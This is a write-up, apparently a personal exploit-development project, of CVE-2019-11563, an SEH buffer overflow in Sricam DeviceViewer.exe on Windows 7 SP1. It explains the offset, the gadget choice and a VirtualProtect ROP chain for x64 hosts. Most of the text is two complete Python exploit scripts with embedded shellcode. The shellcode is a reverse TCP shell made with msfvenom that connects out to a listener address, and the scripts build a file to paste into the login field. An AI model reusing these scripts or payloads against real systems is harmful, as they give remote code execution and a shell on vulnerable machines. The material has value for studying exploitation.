# CVE-2019-11563 DeviceViewer.exe SEH Overflow
## x86 Windows 7 Sp1 Exploit
### Discovering the exploit
When going through the proof of concept for this exploit, the first step was to look at the protections of all the modules to confirm that an SEH overflow was possible. As you can see below, while the original executable has protections for SAFE SEH, there are DLL files that are included that don't. This gives us the ability to attack the SEH Structure, and overwrite it with what we want. Furthermore, many of the DLL's don't have DEP or ASLR, making things even more convenient since we won't have to go in and bypass those protections.
**Figure 1 - Mona modules list showing protections for all loaded dlls and binaries**
The next step in the process is to fuzz the executable by sending in arbitrary amounts of long formatted inputs, and seeing what breaks. By doing this, we are able to see that the stack gets overwritten with our input, and causes a BEX (Buffer overflow Exception). Looking at the binary in Immunity Debugger, we are able to see that the SEH is overwritten after 264 bytes. This is our offset. Using that offset, we can then accurately overwrite the SEH with our own code, as shown in figure 2 below.
**Figure 2 - Stack buffer overflow reaching SE Handler structure**
### Crafting the payload
Before going too much further, it was important to decipher which characters were considered 'bad characters'. These characters can / will mess with our shellcode input, causing it to function incorrectly. A helpful tip for printing out a char list to use is `!mona bytearray`.
The original CVE found that `\x00\x0d\x0a` were bad characters... but with my windows 7 sp1 machine I also found that most bytes that start with `\x8` or `\x9` would cause trouble. So when including any instructions or shellcode I would avoid these characters.
When dealing with SEH overflows, the common method is to find a `POP; POP; RET;` function somewhere. This sequence of commands will execute the 'Pointer to the next SEH record', which in our case is a JMP function to some code we want to execute. It is important to find this gadget from a location that doesn't have SAFE SEH enabled so that we can bypass DeviceViewer.exe's SAFE SEH protection. In our case we used the address of `0x69901d06` which comes from the avformat-54.dll which as you can see in figure 1, doesn't have SAFE SEH.
As you can see in figure 3, the instruction works successfully and gets us our initial jmp instruction. Afterwards we put a breakpoint so that we can see it in action (`\xcc`). This jmp instruction will jump us 6 bytes forward, into our NOP sled.
**Figure 3 - Overflow JMP asm on the stack**
After stepping through you can see the jmp goes into the nop sled before entering our shellcode. You can see this in figure 4 below.
**Figure 4 - NOP sled before shellcode**
When executing the full exploit you can see the success of the reverse_tcp payload working below as it allows us to get a reverse shell.
**Figure 5 - Reverse TCP functioning correctly on Kali vm**
### Summary
1. First, an offset is discovered which gives us access to overwrite the SEH structure (264 bytes).
2. We then pack a jmp instruction and a memory address of a `POP; POP; RET;` that we found in a DLL that does NOT have SAFE SEH. The full code would be `0x06EBCC90`, `0x69901D06`.
3. After we overwrite the SE Handler, we put a buffer of NOP instuctions, that will slide right into our shellcode.
4. Finally, we can pass in our shellcode here. This can be whatever we want. For this example, we used msfvenom to generate a windows reverse tcp shell. Command used: `msfvenom -p windows/shell_reverse_tcp lport=1234 lhost=192.168.56.102 -f c -b '\x00\x0a\x0d' -a x86 --platform windows EXITFUNC=seh`
## x64 Windows 7 Sp1 Exploit
When attempting to run the initial exploit, we found that it was having issues on 64 bit systems. Specifially on windows 7 sp1 x64, it seemed like there were extra protections in place that prevented the execution of shellcode on the stack. The original CVE was only based on x86, so this was a challenge for us. While trying to work through this problem, we encountered numerous difficulties that prevented us from executing our payload. We decided to focus on this problem, to both better understand windows internals on a 32 vs 64 bit OS, as well as the protections associated with each.
For some unknown reason even though both x86 and x64 bit versions had the same protections (DEP, SAFE SEH, ASLR as you can see by looking at x64 modules below), whenever you attempt to use the SEH overflow to gain stack execution, it throws an access violation. In a debugger, we were able to see that the program jumps to the right instruction in our payload, however it seems that it is non-executable even through we are executing through the exception handler. Even though we're running on a 64 bit machine, the process is still x86 so it *should* execute similarly to an x86 OS. For some reason it didn't. Our hypothesis is that it's run using sysmon64, which could potentially add some extra permissions that prevent the traditional SEH overflow from being utilized. Despite the mystery on why it doesn't work as intended, we still are able to find a workaround using ROP chaining to get arbitrary code execution through editing permissions.
**Figure 6 - DLL / Binary protections on x64 windows 7**
As you can see below, at the bottom of the image displays "Access violation when executing [0035F27C]". This lovely access violation on the x64 bit machine is the start of our payload on the stack. This occurs after calling the `POP, POP, ret`. Unfortunately, this prevents us from using our current instruction set. Luckily we are able to replace this instruction set with something that may potentially work.
What we decided to do was find a way to get a use Return Oriented Programming (ROP) chain to get our desired outcome. We have two advantages here:
1. We are able to control the stack
2. We have at least one instruction gadget to set our chain in motion
The chosen instruction set can be seen below, where the address in avcodec-54.dll `0x6a23c5f3` performs the following instructions `# ADD ESP,0CDC # POP EBX # POP ESI # POP EDI # POP EBP # RETN`. This performs a stack pivot that moves the stack forward towards our ROP chain locations and then returns into it (after a facing a couple side effects of pops). You can see this instruction being called below in IDA.
Our full rop chain is composed of multiple gadgets that set all the parameters and addresses to get virtualprotect working properly. This gives the stack execution permissions to then jump into our shellcode location. One of the gadgets has a side effect of needing a real address in memory to be inside of ESI. Because of this, with the first instruction in the stack pivot we place a real address ( the data section of a DLL) into ESI so the rop chain doesn't fail. Below is our rop chain instructions.
```
#[---INFO:gadgets_to_set_esi:---]
0x6a59babd, # POP EAX # RETN [avcodec-54.dll]
0x6ad38304, # ptr to &VirtualProtect() [IAT avcodec-54.dll]
0x699150dc, # MOV EAX,DWORD PTR DS:[EAX] # RETN [avformat-54.dll]
0x6a2ff8db, # XCHG EAX,ESI # RETN [avcodec-54.dll]
#[---INFO:gadgets_to_set_ebp:---]
0x699bb423, # POP EBP # RETN [avformat-54.dll]
0x6a1215c3, # & push esp # ret [avcodec-54.dll]
#[---INFO:gadgets_to_set_ebx:---]
0x6a569810, # POP EDX # RETN [avcodec-54.dll]
0xfffffdff, # Value to negate, will become 0x00000201
0x6a5d3987, # NEG EDX # RETN [avcodec-54.dll]
0x6a341293, # PUSH EDX # MOV DWORD PTR DS:[EAX+EDX],ECX # POP EBX # RETN [avcodec-54.dll]
#[---INFO:gadgets_to_set_edx:---]
0x6a569810, # POP EDX # RETN [avcodec-54.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x6a5d3732, # NEG EDX # RETN [avcodec-54.dll]
#[---INFO:gadgets_to_set_ecx:---]
0x6a5fb07c, # POP ECX # RETN [avcodec-54.dll]
0x6ae9c4da, # &Writable location [avutil-50.dll]
#[---INFO:gadgets_to_set_edi:---]
0x6998fa12, # POP EDI # RETN [avformat-54.dll]
0x6a2420ea, # RETN (ROP NOP) [avcodec-54.dll]
#[---INFO:gadgets_to_set_eax:---]
0x6a5d87ea, # POP EAX # RETN [avcodec-54.dll]
0x90909090, # nop
#[---INFO:pushad:---]
0x6a5eb992, # PUSHAD # RETN [avcodec-54.dll]
```
After successfully finishing the ROP chain now you can see below in IDA that the stack is now executbale and you can now run the shellcode you have in place.
## x86 Full Shellcode
Tested on Python 2.7.1
OS: Win7-sp1-x86
```python=
#!/usr/bin/python2.7
import struct
import subprocess
shellcode =(
"\xda\xc0\xd9\x74\x24\xf4\xb8\x72\x31\x45\x27\x5b\x2b\xc9\xb1"
"\x52\x31\x43\x17\x83\xc3\x04\x03\x31\x22\xa7\xd2\x49\xac\xa5"
"\x1d\xb1\x2d\xca\x94\x54\x1c\xca\xc3\x1d\x0f\xfa\x80\x73\xbc"
"\x71\xc4\x67\x37\xf7\xc1\x88\xf0\xb2\x37\xa7\x01\xee\x04\xa6"
"\x81\xed\x58\x08\xbb\x3d\xad\x49\xfc\x20\x5c\x1b\x55\x2e\xf3"
"\x8b\xd2\x7a\xc8\x20\xa8\x6b\x48\xd5\x79\x8d\x79\x48\xf1\xd4"
"\x59\x6b\xd6\x6c\xd0\x73\x3b\x48\xaa\x08\x8f\x26\x2d\xd8\xc1"
"\xc7\x82\x25\xee\x35\xda\x62\xc9\xa5\xa9\x9a\x29\x5b\xaa\x59"
"\x53\x87\x3f\x79\xf3\x4c\xe7\xa5\x05\x80\x7e\x2e\x09\x6d\xf4"
"\x68\x0e\x70\xd9\x03\x2a\xf9\xdc\xc3\xba\xb9\xfa\xc7\xe7\x1a"
"\x62\x5e\x42\xcc\x9b\x80\x2d\xb1\x39\xcb\xc0\xa6\x33\x96\x8c"
"\x0b\x7e\x28\x4d\x04\x09\x5b\x7f\x8b\xa1\xf3\x33\x44\x6c\x04"
"\x33\x7f\xc8\x9a\xca\x80\x29\xb3\x08\xd4\x79\xab\xb9\x55\x12"
"\x2b\x45\x80\xb5\x7b\xe9\x7b\x76\x2b\x49\x2c\x1e\x21\x46\x13"
"\x3e\x4a\x8c\x3c\xd5\xb1\x47\x83\x82\x81\xf1\x6b\xd1\xf1\xf9"
"\xb9\x5c\x17\x6b\x2e\x09\x80\x04\xd7\x10\x5a\xb4\x18\x8f\x27"
"\xf6\x93\x3c\xd8\xb9\x53\x48\xca\x2e\x94\x07\xb0\xf9\xab\xbd"
"\xdc\x66\x39\x5a\x1c\xe0\x22\xf5\x4b\xa5\x95\x0c\x19\x5b\x8f"
"\xa6\x3f\xa6\x49\x80\xfb\x7d\xaa\x0f\x02\xf3\x96\x2b\x14\xcd"
"\x17\x70\x40\x81\x41\x2e\x3e\x67\x38\x80\xe8\x31\x97\x4a\x7c"
"\xc7\xdb\x4c\xfa\xc8\x31\x3b\xe2\x79\xec\x7a\x1d\xb5\x78\x8b"
"\x66\xab\x18\x74\xbd\x6f\x26\x84\x0f\x7a\xbf\x3f\xfa\xc7\xdd"
"\xbf\xd1\x04\xd8\x43\xd3\xf4\x1f\x5b\x96\xf1\x64\xdb\x4b\x88"
"\xf5\x8e\x6b\x3f\xf5\x9a")
max_size = 4000
buf = 'A'*264
buf += '\x90\xcc\xeb\x06' #jump short 6-bytes
buf += '\x06\x1d\x90\x69' #avformat-54.dll POP POP RET
buf += '\x90' * 16 #NOP Sled
buf += shellcode
buf += 'C'*(max_size - len(buf)) #Filler to 4k
print '[+] %s bytes buffer created...' %len(buf)
try:
filename = 'CVE-2019-11563.txt'
file = open(filename , 'w')
file.write(buf)
print '[+] Evil buffer saved to file: ' + filename
print '[+] Copy + paste its contents into the "user" field and hit login'
file.close()
except:
print "[!] Could not create file!"
p1 = subprocess.Popen(["C:\Program Files\Immunity Inc\Immunity Debugger\ImmunityDebugger.exe", "C:\Program Files\DeviceViewer\DeviceViewer.exe"], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
```
## x64 Full Shellcode
```python=
#!/usr/bin/python
import struct
import os
import subprocess
#------------------------------------------------------------#
# CVE-2019-11563 #
# #
# Sricam DeviceViewer.exe 'username' field SEH overflow #
# by Hayden Wright #
# #
# (*) badchars = '\x00\x0a\x0d' #
# (*) SEH = 0x6a413969 OFFSET 268 #
# (*) nSEH = 268 -4 #
# #
# 69901d06 5E POP ESI #
# 69901d07 5F POP EDI #
# 69901d08 C3 RETN #
# #
#------------------------------------------------------------#
#msfvenom -p windows/shell_reverse_tcp lport=1234 lhost=192.168.1.101 -f c -b '\x00\x0a\x0d' -a x86 --platform windows EXITFUNC=seh
shellcode =(
"\xb8\x51\x9c\x1c\xa4\xda\xc9\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
"\x52\x31\x42\x12\x83\xea\xfc\x03\x13\x92\xfe\x51\x6f\x42\x7c"
"\x99\x8f\x93\xe1\x13\x6a\xa2\x21\x47\xff\x95\x91\x03\xad\x19"
"\x59\x41\x45\xa9\x2f\x4e\x6a\x1a\x85\xa8\x45\x9b\xb6\x89\xc4"
"\x1f\xc5\xdd\x26\x21\x06\x10\x27\x66\x7b\xd9\x75\x3f\xf7\x4c"
"\x69\x34\x4d\x4d\x02\x06\x43\xd5\xf7\xdf\x62\xf4\xa6\x54\x3d"
"\xd6\x49\xb8\x35\x5f\x51\xdd\x70\x29\xea\x15\x0e\xa8\x3a\x64"
"\xef\x07\x03\x48\x02\x59\x44\x6f\xfd\x2c\xbc\x93\x80\x36\x7b"
"\xe9\x5e\xb2\x9f\x49\x14\x64\x7b\x6b\xf9\xf3\x08\x67\xb6\x70"
"\x56\x64\x49\x54\xed\x90\xc2\x5b\x21\x11\x90\x7f\xe5\x79\x42"
"\xe1\xbc\x27\x25\x1e\xde\x87\x9a\xba\x95\x2a\xce\xb6\xf4\x22"
"\x23\xfb\x06\xb3\x2b\x8c\x75\x81\xf4\x26\x11\xa9\x7d\xe1\xe6"
"\xce\x57\x55\x78\x31\x58\xa6\x51\xf6\x0c\xf6\xc9\xdf\x2c\x9d"
"\x09\xdf\xf8\x32\x59\x4f\x53\xf3\x09\x2f\x03\x9b\x43\xa0\x7c"
"\xbb\x6c\x6a\x15\x56\x97\xfd\xda\x0f\x96\x98\xb2\x4d\x98\x66"
"\x91\xdb\x7e\x0c\x05\x8a\x29\xb9\xbc\x97\xa1\x58\x40\x02\xcc"
"\x5b\xca\xa1\x31\x15\x3b\xcf\x21\xc2\xcb\x9a\x1b\x45\xd3\x30"
"\x33\x09\x46\xdf\xc3\x44\x7b\x48\x94\x01\x4d\x81\x70\xbc\xf4"
"\x3b\x66\x3d\x60\x03\x22\x9a\x51\x8a\xab\x6f\xed\xa8\xbb\xa9"
"\xee\xf4\xef\x65\xb9\xa2\x59\xc0\x13\x05\x33\x9a\xc8\xcf\xd3"
"\x5b\x23\xd0\xa5\x63\x6e\xa6\x49\xd5\xc7\xff\x76\xda\x8f\xf7"
"\x0f\x06\x30\xf7\xda\x82\x4e\x09\xd6\x1e\xc6\xb0\x83\x62\x8a"
"\x42\x7e\xa0\xb3\xc0\x8a\x59\x40\xd8\xff\x5c\x0c\x5e\xec\x2c"
"\x1d\x0b\x12\x82\x1e\x1e")
shellcodex64 = ("\xda\xd1\xd9\x74\x24\xf4\xbf\x86\xa0\x92\xe7\x58\x2b\xc9\xb1"
"\x52\x83\xc0\x04\x31\x78\x13\x03\xfe\xb3\x70\x12\x02\x5b\xf6"
"\xdd\xfa\x9c\x97\x54\x1f\xad\x97\x03\x54\x9e\x27\x47\x38\x13"
"\xc3\x05\xa8\xa0\xa1\x81\xdf\x01\x0f\xf4\xee\x92\x3c\xc4\x71"
"\x11\x3f\x19\x51\x28\xf0\x6c\x90\x6d\xed\x9d\xc0\x26\x79\x33"
"\xf4\x43\x37\x88\x7f\x1f\xd9\x88\x9c\xe8\xd8\xb9\x33\x62\x83"
"\x19\xb2\xa7\xbf\x13\xac\xa4\xfa\xea\x47\x1e\x70\xed\x81\x6e"
"\x79\x42\xec\x5e\x88\x9a\x29\x58\x73\xe9\x43\x9a\x0e\xea\x90"
"\xe0\xd4\x7f\x02\x42\x9e\xd8\xee\x72\x73\xbe\x65\x78\x38\xb4"
"\x21\x9d\xbf\x19\x5a\x99\x34\x9c\x8c\x2b\x0e\xbb\x08\x77\xd4"
"\xa2\x09\xdd\xbb\xdb\x49\xbe\x64\x7e\x02\x53\x70\xf3\x49\x3c"
"\xb5\x3e\x71\xbc\xd1\x49\x02\x8e\x7e\xe2\x8c\xa2\xf7\x2c\x4b"
"\xc4\x2d\x88\xc3\x3b\xce\xe9\xca\xff\x9a\xb9\x64\x29\xa3\x51"
"\x74\xd6\x76\xf5\x24\x78\x29\xb6\x94\x38\x99\x5e\xfe\xb6\xc6"
"\x7f\x01\x1d\x6f\x15\xf8\xf6\x50\x42\x3a\xcf\x39\x91\x3a\xcb"
"\x6b\x1c\xdc\xb9\x9b\x49\x77\x56\x05\xd0\x03\xc7\xca\xce\x6e"
"\xc7\x41\xfd\x8f\x86\xa1\x88\x83\x7f\x42\xc7\xf9\xd6\x5d\xfd"
"\x95\xb5\xcc\x9a\x65\xb3\xec\x34\x32\x94\xc3\x4c\xd6\x08\x7d"
"\xe7\xc4\xd0\x1b\xc0\x4c\x0f\xd8\xcf\x4d\xc2\x64\xf4\x5d\x1a"
"\x64\xb0\x09\xf2\x33\x6e\xe7\xb4\xed\xc0\x51\x6f\x41\x8b\x35"
"\xf6\xa9\x0c\x43\xf7\xe7\xfa\xab\x46\x5e\xbb\xd4\x67\x36\x4b"
"\xad\x95\xa6\xb4\x64\x1e\xd8\x45\xb4\x8b\x4d\xfc\x2d\xf6\x13"
"\xff\x98\x35\x2a\x7c\x28\xc6\xc9\x9c\x59\xc3\x96\x1a\xb2\xb9"
"\x87\xce\xb4\x6e\xa7\xda")
#!mona rop -cpb '\x00\x0d\x4d\x5d\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\x5d\x6d\x7d\x8d\x9d'
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
#[---INFO:gadgets_to_set_esi:---]
0x6a59babd, # POP EAX # RETN [avcodec-54.dll]
0x6ad38304, # ptr to &VirtualProtect() [IAT avcodec-54.dll]
0x699150dc, # MOV EAX,DWORD PTR DS:[EAX] # RETN [avformat-54.dll]
0x6a2ff8db, # XCHG EAX,ESI # RETN [avcodec-54.dll]
#[---INFO:gadgets_to_set_ebp:---]
0x699bb423, # POP EBP # RETN [avformat-54.dll]
0x6a1215c3, # & push esp # ret [avcodec-54.dll]
#[---INFO:gadgets_to_set_ebx:---]
0x6a569810, # POP EDX # RETN [avcodec-54.dll]
0xfffffdff, # Value to negate, will become 0x00000201
0x6a5d3987, # NEG EDX # RETN [avcodec-54.dll]
0x6a341293, # PUSH EDX # MOV DWORD PTR DS:[EAX+EDX],ECX # POP EBX # RETN [avcodec-54.dll]
#[---INFO:gadgets_to_set_edx:---]
0x6a569810, # POP EDX # RETN [avcodec-54.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x6a5d3732, # NEG EDX # RETN [avcodec-54.dll]
#[---INFO:gadgets_to_set_ecx:---]
0x6a5fb07c, # POP ECX # RETN [avcodec-54.dll]
0x6ae9c4da, # &Writable location [avutil-50.dll]
#[---INFO:gadgets_to_set_edi:---]
0x6998fa12, # POP EDI # RETN [avformat-54.dll]
0x6a2420ea, # RETN (ROP NOP) [avcodec-54.dll]
#[---INFO:gadgets_to_set_eax:---]
0x6a5d87ea, # POP EAX # RETN [avcodec-54.dll]
0x90909090, # nop
#[---INFO:pushad:---]
0x6a5eb992, # PUSHAD # RETN [avcodec-54.dll]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
max_size = 4000
# for Rop Chain need to add 2644 or A54 to get to
# could be b58 close to 3 grand
# the start of overflow for esp reg
#0x6a23c5f3 : {pivot 3308 / 0xcec} : # ADD ESP,0CDC # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [avcodec-54.dll] ** | {PAGE_EXECUTE_READ}
#0x6a19c53f : {pivot 3100 / 0xc1c} : # ADD ESP,0C0C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [avcodec-54.dll] ** | {PAGE_EXECUTE_READ}
buf = 'A'*(264-10)
buf += 'D'*10
buf += '\x90\xCC\xeb\x06' #jump short 6-bytes
#\x00\x0d\x0a are the bad chars
'''buf += ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")'''
buf += struct.pack("<I",0x6a19c53f)
#buf += struct.pack('<I', 0x69901d06) #POP ESI, POP EDI, RET avformat-54.dll
buf += '\x41' * 15
buf += '\xcc' #INT 3
buf += 'F'*(172-4-16)
buf += 'A'*4 #pop ebx junk
buf += struct.pack("<I",0x68b9a111) #pop esi junk -- make sure its a real address to deal with side effect and writeable
buf += 'C'*4 #pop edi junk
buf += 'D'*4 #pop ebp junk
buf += create_rop_chain()
#buf += 'F' *4
#buf += '\xeb\x06\x90\x90' #jump short 6-bytes
#buf += struct.pack('<I', 0x69901d06) #POP ESI, POP EDI, RET avformat-54.dll
#buf += '\x06\x1d\x90\x69'
#buf += 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9'
#buf += shellcode
buf += '\x90'*(max_size - len(buf))
print '[+] %s bytes buffer created...' %len(buf)
try:
filename = 'CVE-2019-11563.txt'
file = open(filename , 'w')
file.write(buf)
print '[+] Evil buffer saved to file: ' + filename
print '[+] Copy + paste its contents into the "user" field and hit login'
file.close()
except:
print "[!] Could not create file!"
p1 = subprocess.Popen(["C:\Program Files (x86)\Immunity Inc\Immunity Debugger\ImmunityDebugger.exe","C:\Program Files (x86)\DeviceViewer\DeviceViewer.exe"], stdin = subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
```
Sign in with Wallet
Connect another wallet